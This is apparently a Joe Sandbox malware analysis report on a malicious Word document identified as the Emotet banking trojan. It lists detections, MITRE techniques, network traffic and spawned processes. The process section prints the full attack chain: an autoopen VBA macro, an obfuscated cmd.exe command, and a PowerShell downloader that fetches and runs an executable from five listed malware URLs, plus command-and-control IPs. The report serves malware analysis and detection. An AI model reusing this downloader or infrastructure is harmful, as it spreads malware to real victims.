Loading ...

Analysis Report PAY3646944800277778.doc

Overview

General Information

Joe Sandbox Version:25.0.0 Tiger's Eye
Analysis ID:105688
Start date:23.01.2019
Start time:21:17:48
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 34s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:PAY3646944800277778.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:18
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.expl.evad.winDOC@24/19@1/4
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 25.2% (good quality ratio 17.5%)
  • Quality average: 53.2%
  • Quality standard deviation: 40.8%
HCA Information:
  • Successful, ratio: 96%
  • Number of executed functions: 69
  • Number of non-executed functions: 63
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, wermgr.exe, conhost.exe, CompatTelRunner.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtCreateFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold1000 - 100Report FP / FNfalsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid Accounts2Command-Line Interface1Valid Accounts2Valid Accounts2Valid Accounts2Credential DumpingProcess Discovery2Application Deployment SoftwareData from Local SystemData Encrypted1Uncommonly Used Port1
Replication Through Removable MediaService Execution1Modify Existing Service1Process Injection1Disabling Security Tools1Network SniffingSecurity Software Discovery131Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Cryptographic Protocol2
Drive-by CompromisePowerShell3New Service2New Service2Process Injection1Input CaptureRemote System Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3
Exploit Public-Facing ApplicationScripting32System FirmwareDLL Search Order HijackingScripting32Credentials in FilesSystem Service Discovery1Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol23
Spearphishing LinkExploitation for Client Execution13Shortcut ModificationFile System Permissions WeaknessObfuscated Files or Information11Account ManipulationSystem Information Discovery12Shared WebrootData StagedScheduled TransferStandard Cryptographic Protocol

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for URL or domainShow sources
Source: http://iedgeconsulting.net/QJPEwNCAvira URL Cloud: Label: malware
Source: http://iedgeconsulting.net/QJPEwNC/Avira URL Cloud: Label: malware
Source: http://189.253.39.50:8080/Avira URL Cloud: Label: malware
Source: http://pramlee.my/J1KMcYHbfVAvira URL Cloud: Label: malware
Source: http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3YhAvira URL Cloud: Label: malware
Source: http://189.253.39.50:8080/4Avira URL Cloud: Label: malware
Source: http://www.festivaldescons.fr/zOm7C7jP7DPkcyAvira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URLShow sources
Source: http://iedgeconsulting.net/QJPEwNCvirustotal: Detection: 8%Perma Link
Source: http://iedgeconsulting.net/QJPEwNC/virustotal: Detection: 9%Perma Link
Source: http://189.253.39.50:8080/virustotal: Detection: 7%Perma Link
Source: http://206.248.110.184:8080/virustotal: Detection: 10%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\968.exevirustotal: Detection: 20%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: PAY3646944800277778.docvirustotal: Detection: 22%Perma Link

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E72496 CryptDestroyHash,17_2_00E72496
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E72279 CryptExportKey,17_2_00E72279
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E723B7 CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,17_2_00E723B7
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E72399 CryptGenKey,CryptDestroyKey,CryptReleaseContext,17_2_00E72399
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E72335 CryptImportKey,LocalFree,CryptReleaseContext,17_2_00E72335
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E72315 CryptDecodeObjectEx,CryptReleaseContext,17_2_00E72315
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E724F6 CryptDuplicateHash,CryptDecrypt,CryptDestroyHash,17_2_00E724F6
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E72466 CryptEncrypt,CryptDestroyHash,17_2_00E72466
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E72406 CryptDuplicateHash,17_2_00E72406
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E72595 CryptVerifySignatureW,CryptDestroyHash,17_2_00E72595
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E722C9 CryptGetHashParam,17_2_00E722C9

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
Allocates a big amount of memory (probably used for heap spraying)Show sources
Source: winword.exeMemory has grown: Private usage: 1MB later: 73MB
Found inlined nop instructions (likely shell or obfuscated code)Show sources
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 4x nop then ret 12_2_004044C0
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 4x nop then ret 15_2_004044C0
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 4x nop then ret 16_2_004044C0
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 4x nop then ret 17_2_004044C0
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: iedgeconsulting.net
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.2.5:49796 -> 176.9.208.67:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.2.5:49796 -> 176.9.208.67:80

Networking:

barindex
Detected TCP or UDP traffic on non-standard portsShow sources
Source: global trafficTCP traffic: 192.168.2.5:49800 -> 206.248.110.184:8080
Source: global trafficTCP traffic: 192.168.2.5:49801 -> 189.253.39.50:8080
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 182.180.170.72
Source: unknownTCP traffic detected without corresponding DNS query: 182.180.170.72
Source: unknownTCP traffic detected without corresponding DNS query: 182.180.170.72
Source: unknownTCP traffic detected without corresponding DNS query: 189.253.39.50
Source: unknownTCP traffic detected without corresponding DNS query: 189.253.39.50
Source: unknownTCP traffic detected without corresponding DNS query: 189.253.39.50
Source: unknownTCP traffic detected without corresponding DNS query: 189.253.39.50
Connects to country known for bullet proof hostersShow sources
Source: unknownNetwork traffic detected: IP: 182.180.170.72 Pakistan
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /QJPEwNC HTTP/1.1Host: iedgeconsulting.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /QJPEwNC/ HTTP/1.1Host: iedgeconsulting.net
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 182.180.170.72 182.180.170.72
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox ViewASN Name: UninetSAdeCVMX UninetSAdeCVMX
Uses SMTP (mail sending)Show sources
Source: global trafficTCP traffic: 192.168.2.5:49797 -> 182.180.170.72:22
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: 59286=PCftMZaSHhGgqcriJOtz3Y/NaHyADyMXDqFOOq3G5WfNL95jnJWU9gPqH6+eyVkZoW+wFNJDwOMlY7RoO8GFLErINkHZWvvR3q14WWonbgAwSLnEiIvcsbMa+AVWQYfOt5Wdhl0Cv6U96mqd3Pf1ZKSiphmL8FKToeuxYMdAZyLGyI2wGKujB5RI/yNuLjOJIc7uy5Unc5jW93lm32xi5KDEXgWwsMn9W/d6mSV045q5AG1pOSLndNnjKDJTErIK3Jw9SE0MeO1LHJNToTifpH9w8kf8IfFiJkeT7wH3qXmUgM0TPdlwOFwna1vBajKYM2L8LCdjNC3n+eL4aUYIX47h1D/wNL3YWKBFDtd4b+mrf/z/TwEdh+N8bcUIVInx47Uzqml+qcMYRhxQMEU1SN8PGwrhy0JfwiChahSKYkzUBZTXpcVJVvwIvh+PRKPW61S09tcFmc5t1nLMoEFWEVnkW189UldyARwMIqX9RDd29szH6BPE9nCDtNwKAdMCVbgSwjwMQGNhZ/GO6E1wFeVSRzMdrDZn9al0CJ6hj74jJDdfNlnzciXptJ9PuGnchVrItn0qiUBxrSeOrHaTHti21mdmdFtPdAEK6HJ0s0/0G3EHUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 189.253.39.50:8080Connection: Keep-AliveCache-Control: no-cache
Contains functionality to download additional files from the internetShow sources
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E71628 InternetReadFile,17_2_00E71628
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /QJPEwNC HTTP/1.1Host: iedgeconsulting.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /QJPEwNC/ HTTP/1.1Host: iedgeconsulting.net
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Cookie: 59286=PCftMZaSHhGgqcriJOtz3Y/NaHyADyMXDqFOOq3G5WfNL95jnJWU9gPqH6+eyVkZoW+wFNJDwOMlY7RoO8GFLErINkHZWvvR3q14WWonbgAwSLnEiIvcsbMa+AVWQYfOt5Wdhl0Cv6U96mqd3Pf1ZKSiphmL8FKToeuxYMdAZyLGyI2wGKujB5RI/yNuLjOJIc7uy5Unc5jW93lm32xi5KDEXgWwsMn9W/d6mSV045q5AG1pOSLndNnjKDJTErIK3Jw9SE0MeO1LHJNToTifpH9w8kf8IfFiJkeT7wH3qXmUgM0TPdlwOFwna1vBajKYM2L8LCdjNC3n+eL4aUYIX47h1D/wNL3YWKBFDtd4b+mrf/z/TwEdh+N8bcUIVInx47Uzqml+qcMYRhxQMEU1SN8PGwrhy0JfwiChahSKYkzUBZTXpcVJVvwIvh+PRKPW61S09tcFmc5t1nLMoEFWEVnkW189UldyARwMIqX9RDd29szH6BPE9nCDtNwKAdMCVbgSwjwMQGNhZ/GO6E1wFeVSRzMdrDZn9al0CJ6hj74jJDdfNlnzciXptJ9PuGnchVrItn0qiUBxrSeOrHaTHti21mdmdFtPdAEK6HJ0s0/0G3EHUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 189.253.39.50:8080Connection: Keep-AliveCache-Control: no-cache
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: iedgeconsulting.net
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 23 Jan 2019 20:18:59 GMTServer: ApacheX-Powered-By: PHP/5.6.39Expires: Tue, 01 Jan 1970 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0Pragma: no-cacheContent-Disposition: attachment; filename="ViMBMxGvK9zg.exe"Content-Transfer-Encoding: binaryLast-Modified: Wed, 23 Jan 2019 20:18:59 GMTTransfer-Encoding: chunkedContent-Type: application/octet-streamData Raw: 33 64 30 61 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d2 ef dc e1 96 8e b2 b2 96 8e b2 b2 96 8e b2 b2 9f f6 21 b2 9f 8e b2 b2 96 8e b3 b2 80 8e b2 b2 96 8e b2 b2 97 8e b2 b2 9b dc 69 b2 97 8e b2 b2 9b dc 6c b2 97
Urls found in memory or binary dataShow sources
Source: startedradar.exe, 00000011.00000003.5180227291.00000000005EC000.00000004.sdmpString found in binary or memory: http://182.180.170.72:22/
Source: startedradar.exe, 00000011.00000003.5198344661.00000000005EE000.00000004.sdmpString found in binary or memory: http://189.253.39.50:8080/
Source: startedradar.exe, 00000011.00000003.5198344661.00000000005EE000.00000004.sdmpString found in binary or memory: http://189.253.39.50:8080/4
Source: startedradar.exe, 00000011.00000003.5180227291.00000000005EC000.00000004.sdmpString found in binary or memory: http://206.248.110.184:8080/
Source: powershell.exe, 0000000B.00000003.4510760377.0000000007BB9000.00000004.sdmpString found in binary or memory: http://crl.
Source: powershell.exe, 0000000B.00000002.4523093209.00000000052F0000.00000004.sdmpString found in binary or memory: http://iedgeconsulting.net
Source: PowerShell_transcript.813848.H5FUFIzq.20190123211857.txt.11.drString found in binary or memory: http://iedgeconsulting.net/QJPEwNC
Source: powershell.exe, 0000000B.00000002.4523093209.00000000052F0000.00000004.sdmpString found in binary or memory: http://iedgeconsulting.net/QJPEwNC/
Source: powershell.exe, 0000000B.00000003.4487894048.0000000005C20000.00000004.sdmpString found in binary or memory: http://iedgeconsulting.netP
Source: PowerShell_transcript.813848.H5FUFIzq.20190123211857.txt.11.drString found in binary or memory: http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh
Source: powershell.exe, 0000000B.00000002.4529109760.00000000061FE000.00000004.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.4523093209.00000000052F0000.00000004.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000B.00000003.4510760377.0000000007BB9000.00000004.sdmpString found in binary or memory: http://pramlee.my/J1
Source: PowerShell_transcript.813848.H5FUFIzq.20190123211857.txt.11.drString found in binary or memory: http://pramlee.my/J1KMcYHbfV
Source: powershell.exe, 0000000B.00000002.4522024261.00000000051B0000.00000004.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.4523093209.00000000052F0000.00000004.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: PowerShell_transcript.813848.H5FUFIzq.20190123211857.txt.11.drString found in binary or memory: http://www.festivaldescons.fr/zOm7C7jP7DPkcy
Source: powershell.exe, 0000000B.00000002.4523093209.00000000052F0000.00000004.sdmpString found in binary or memory: http://www.festivaldescons.fr/zOm7C7jP7DPkcy8
Source: powershell.exe, 0000000B.00000002.4523093209.00000000052F0000.00000004.sdmpString found in binary or memory: http://www.festivaldescons.fr/zOm7C7jP7DPkcyP
Source: powershell.exe, 0000000B.00000003.4510760377.0000000007BB9000.00000004.sdmpString found in binary or memory: http://www.zsz-spb.
Source: PowerShell_transcript.813848.H5FUFIzq.20190123211857.txt.11.drString found in binary or memory: http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8
Source: powershell.exe, 0000000B.00000002.4529109760.00000000061FE000.00000004.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.4529109760.00000000061FE000.00000004.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.4529109760.00000000061FE000.00000004.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.4523093209.00000000052F0000.00000004.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000B.00000002.4527682418.0000000005A55000.00000004.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 0000000B.00000002.4529109760.00000000061FE000.00000004.sdmpString found in binary or memory: https://nuget.org/nuget.exe

E-Banking Fraud:

barindex
Detected Emotet e-Banking trojanShow sources
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E7D0F917_2_00E7D0F9

Spam, unwanted Advertisements and Ransom Demands:

barindex
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E72335 CryptImportKey,LocalFree,CryptReleaseContext,17_2_00E72335

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: PAY3646944800277778.docOLE, VBA macro line: jibj = Shell(obhfr + hnsri + rtfqk + fitim + mlhum + uihp + jbpd + tibuj + irbhf + tzav, vbHide)
Powershell connects to networkShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 176.9.208.67 80Jump to behavior
Powershell drops PE fileShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\968.exeJump to dropped file
Contains functionality to call native functionsShow sources
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E7CFF0 NtdllDefWindowProc_W,17_2_00E7CFF0
Contains functionality to delete servicesShow sources
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E7FD30 _snwprintf,OpenServiceW,DeleteService,CloseServiceHandle,17_2_00E7FD30
Contains functionality to launch a process as a different userShow sources
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E7210D CreateProcessAsUserW,17_2_00E7210D
Creates mutexesShow sources
Source: C:\Windows\SysWOW64\startedradar.exeMutant created: \BaseNamedObjects\Global\I3C4E0000
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1176:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\968.exeMutant created: \Sessions\1\BaseNamedObjects\PEM13DC
Source: C:\Users\user\AppData\Local\Temp\968.exeMutant created: \Sessions\1\BaseNamedObjects\PEM6CC
Detected potential crypto functionShow sources
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_004B56EF12_2_004B56EF
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_004B56EF12_2_004B56EF
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E756EF17_2_00E756EF
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E756EF17_2_00E756EF
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: PAY3646944800277778.docOLE, VBA macro line: Sub autoopen()
Document contains embedded VBA macrosShow sources
Source: PAY3646944800277778.docOLE indicator, VBA macros: true
Document contains no OLE stream with summary informationShow sources
Source: PAY3646944800277778.docOLE indicator has summary info: false
Document has an unknown application nameShow sources
Source: PAY3646944800277778.docOLE indicator application name: unknown
Document misses a certain OLE stream usually present in this Microsoft Office document typeShow sources
Source: PAY3646944800277778.docOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Dropped file seen in connection with other malwareShow sources
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\968.exe 34C00C418282067CBC3C5DC419DC093113EE7D0F7E0D26756C091DC1DE6CF3A7
Reads the hosts fileShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Tries to load missing DLLsShow sources
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\968.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\968.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\startedradar.exeSection loaded: wow64log.dll
Source: C:\Windows\SysWOW64\startedradar.exeSection loaded: wow64log.dll
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.expl.evad.winDOC@24/19@1/4
Contains functionality to create servicesShow sources
Source: C:\Windows\SysWOW64\startedradar.exeCode function: _snwprintf,CreateServiceW,CloseServiceHandle,17_2_00E7FDDB
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\AppData\Local\Temp\968.exeCode function: 12_2_004B1C10 CreateToolhelp32Snapshot,12_2_004B1C10
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Windows\SysWOW64\startedradar.exeCode function: 17_2_00E7FE71 StartServiceW,CloseServiceHandle,CloseServiceHandle,17_2_00E7FE71
Creates files inside the user directoryShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{8D1F1AEE-6CCA-49FF-B753-3BBCC32E0FB3}.tmpJump to behavior
Creates temporary filesShow sources
Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER762C.tmpJump to behavior
Document contains summary information with irregular field valuesShow sources
Source: PAY3646944800277778.docOLE document summary: title field not present or empty
Source: PAY3646944800277778.docOLE document summary: author field not present or empty
Source: PAY3646944800277778.docOLE document summary: edited time not present or 0
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\5e7364da399b604ae01baff696551080\mscorlib.ni.dllJump to behavior
Reads ini filesShow sources
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: PAY3646944800277778.docvirustotal: Detection: 22%
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;1
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe CmD /V/C'set JGEv=H8lGVwrCy4LmX sg)$9+7:1POf}3'{Qb~tJM%_BiIUDpA0ak,=vcYEdK-;je@5ST\nzqxFuh(6WoN/.&&for %B in (43;75;5;36;23;41;38;10;40;7;21;32;61;48;22;36;6;36;62;53;62;62;40;24;76;76;44;35;53;21;32;56;9;48;22;36;71;36;63;53;35;23;21;32;56;27;48;22;36;2;2;13;17;51;11;65;25;49;28;67;54;11;66;28;57;17;11;66;58;31;49;65;59;5;56;75;31;58;59;51;33;13;76;59;33;78;74;59;31;7;2;39;59;65;33;57;17;51;11;39;50;49;28;71;33;33;43;21;77;77;39;59;54;15;59;51;75;65;14;70;2;33;39;65;15;78;65;59;33;77;30;34;23;53;5;76;7;60;71;33;33;43;21;77;77;43;6;46;11;2;59;59;78;11;8;77;34;22;55;35;51;52;0;31;25;4;60;71;33;33;43;21;77;77;5;5;5;78;66;14;66;56;14;43;31;78;6;70;77;11;12;33;22;54;45;5;47;37;52;35;76;30;31;55;44;75;1;60;71;33;33;43;21;77;77;58;75;71;65;73;27;61;78;15;75;75;54;33;6;59;46;14;70;6;59;78;6;75;51;47;14;77;31;75;46;46;43;5;75;6;39;77;45;41;74;44;75;18;47;6;27;52;71;60;71;33;33;43;21;77;77;5;5;5;78;25;59;14;33;39;50;46;2;54;59;14;51;75;65;14;78;25;6;77;66;24;11;20;7;20;58;23;20;42;23;47;51;
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' FOR /F 'delims=f=wRb tokens=2' %U IN ('assoc.cmd') DO %U '
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c assoc.cmd
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell $cmnf='qdmz';$mzjb=new-object Net.WebClient;$cmiv='http://iedgeconsulting.net/QJPEwNC@http://pramlee.my/J1KMcYHbfV@http://www.zsz-spb.ru/mXt1d0wk_YMNQbKAo8@http://john635.goodtreasure.rocks/boaapwori/0UWAo9kr3Yh@http://www.festivaldescons.fr/zOm7C7jP7DPkcy'.Split('@');$nwpp='jupvs';$nrls = '968';$owwr='jmpic';$intk=$env:temp+'\'+$nrls+'.exe';foreach($pjppn in $cmiv){try{$mzjb.DownloadFile($pjppn, $intk);$hwrw='qzwp';If ((Get-Item $intk).length -ge 40000) {Invoke-Item $intk;$pmdu='omvtt';break;}}catch{}}$fitbh='nowzz';
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\968.exe 'C:\Users\user\AppData\Local\Temp\968.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\968.exe C:\Users\user\AppData\Local\Temp\968.exe
